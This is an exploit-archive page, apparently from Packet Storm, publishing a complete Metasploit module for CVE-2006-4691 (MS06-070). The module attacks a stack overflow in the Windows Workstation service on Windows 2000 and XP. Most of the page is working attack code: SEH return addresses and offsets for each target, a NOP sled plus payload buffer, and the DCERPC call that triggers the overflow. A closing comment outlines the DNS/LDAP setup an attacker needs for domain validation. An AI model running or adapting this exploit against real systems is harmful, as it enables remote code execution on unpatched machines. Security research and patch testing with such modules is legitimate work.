exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Workstation Service NetpManageIPCConnect Overflow

Microsoft Workstation Service NetpManageIPCConnect Overflow
Posted Dec 31, 2009
Authored by jduck | Site metasploit.com

This Metasploit module exploits a stack overflow in the NetApi32 NetpManageIPCConnect function using the Workstation service in Windows 2000 SP4 and Windows XP SP2. In order to exploit this vulnerability, you must specify a the name of a valid Windows DOMAIN. It may be possible to satisfy this condition by using a custom dns and ldap setup, however that method is not covered here. Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator credentials are required to reach the vulnerable code. Windows XP SP1 only requires valid user credentials. Also, testing shows that a machine already joined to a domain is not exploitable.

tags | exploit, overflow
systems | windows
advisories | CVE-2006-4691
SHA-256 | ea9293c701b97bcc0c680f787edd7ae46789120c6798479e817b203688e6abb8

Microsoft Workstation Service NetpManageIPCConnect Overflow

Change Mirror Download
##
# $Id: ms06_070_wkssvc.rb 8023 2009-12-29 19:22:43Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Seh


def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Workstation Service NetpManageIPCConnect Overflow',
'Description' => %q{
This module exploits a stack overflow in the NetApi32 NetpManageIPCConnect
function using the Workstation service in Windows 2000 SP4 and Windows XP SP2.

In order to exploit this vulnerability, you must specify a the name of a
valid Windows DOMAIN. It may be possible to satisfy this condition by using
a custom dns and ldap setup, however that method is not covered here.

Although Windows XP SP2 is vulnerable, Microsoft reports that Administrator
credentials are required to reach the vulnerable code. Windows XP SP1 only
requires valid user credentials. Also, testing shows that a machine already
joined to a domain is not exploitable.
},
'Author' =>
[
'jduck'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 8023 $',
'References' =>
[
[ 'CVE', '2006-4691' ],
[ 'OSVDB', '30263' ],
[ 'BID', '20985' ],
[ 'MSB', 'MS06-070' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic Targetting', { } ],
[ 'Windows 2000 SP4',
{
'Offset' => (1058*2),
'Ret' => 0x75022ac4 # pop/pop/ret in ws2help.dll
}
],
[ 'Windows XP SP0/SP1',
{
'Offset' => (1290*2),
'Ret' => 0x71ab21cd # pop/pop/ret in ws2_32.dll
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 14 2006'))

register_options(
[
OptString.new('SMBPIPE', [ true, "The pipe name to use.", 'WKSSVC']),
# NOTE: a valid domain name is required. See description.
OptString.new('DOMAIN', [ true, "The domain to validate prior to joining it."])
], self.class)

end

def exploit

connect()
smb_login()

mytarget = nil
if (target.name =~ /Automatic/)
case smb_peer_os()
when 'Windows 5.0'
print_status("Detected a Windows 2000 target")
mytarget = targets[1]
when 'Windows 5.1'
begin
smb_create("\\SRVSVC")
print_status("Detected a Windows XP SP0/SP1 target")
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
if (e.error_code == 0xc0000022)
raise RuntimeError, "Windows XP SP2 requires Administrator privileges!"
end
print_status("Detected a Windows XP target (unknown patch level)")
end
mytarget = targets[2]
else
raise RuntimeError, "No target detected for #{smb_peer_os()}/#{smb_peer_lm()}..."
end
else
mytarget = target
end

handle = dcerpc_handle(
'6bffd098-a112-3610-9833-46c3f87e345a', '1.0',
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)

print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")

print_status("Building the stub data...")

distance = mytarget['Offset']
hostname = make_nops(distance - payload.encoded.length)
hostname << payload.encoded
hostname << generate_seh_record(mytarget.ret)
hostname << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string

name = datastore['DOMAIN'] + "\\\\L"
name = Rex::Text.to_unicode(name)
name << hostname
name << Rex::Text.to_unicode(rand_text_alphanumeric(1000) * 3)
name << "\x00\x00"

stub =
NDR.uwstring("\\\\#{datastore['RHOST']}") +
NDR.UnicodeConformantVaryingStringPreBuilt(name) +
NDR.uwstring("") +
NDR.uwstring("") +
NDR.long(0) +
NDR.long(1)

print_status("Calling the vulnerable function...")

begin
dcerpc.call(0x16, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
rescue => e
if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
raise e
end
end

# Cleanup
handler
disconnect
end

end



=begin

The IDL for NetrJoinDomain2 looks like this:
long _NetrJoinDomain2@28 (
[in][unique][string] wchar_t * arg_1,
[in][string] wchar_t * arg_2,
[in][unique][string] wchar_t * arg_3,
[in][unique][string] wchar_t * arg_4,
[in][unique] struct_C * arg_5,
[in] long arg_6
);


1. --> dns server - query for IN.SRV _ldap._tcp.dc._msdcs.DOMAIN
2. <-- dns server - response including answer and additional record.
answer: whateverserver.DOMAIN priority 0 / weight 100 / port 389
additional: IN.A address of whateverserver.DOMAIN
3. --> ldap server - baseObject query with filter/attributes:
- filter: (&(&(DnsDomain=DOMAIN)(Host=TARGETHOSTNAME))(NtVer=06:00:00:00))
- attributes: AttributeDescriptionList: NetLogon
4. <-- ldap server - searchResDone success, attributes data
- PartialAttributeList netlogon - 1 item
- type 23, flags 0x1fd, domain GUID,
forest, domain, hostname, netbios domain, netbios hostname,
user, site, client site, version, lmtoken, nttoken
5. validated.

=end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close